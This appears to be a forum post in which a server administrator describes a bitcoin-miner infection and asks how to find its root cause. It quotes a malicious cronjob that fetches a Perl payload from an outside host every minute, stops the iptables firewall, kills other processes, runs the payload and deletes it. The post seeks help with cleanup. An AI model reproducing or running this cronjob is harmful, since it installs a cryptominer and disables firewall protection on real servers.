I installed Clamav and rootkits detectors and they found nothing.
The virus run a few process named modules that eating cpu, my server vendor told me that it is bitcoin miner virus but they didn't give me any other info. The only thing that I found out is this cronjob:
* * * * * curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish
I killed all the process and removed the cronjob. /tmp folder is empty. The problem is that I didn't find the core "problem". What else can I do?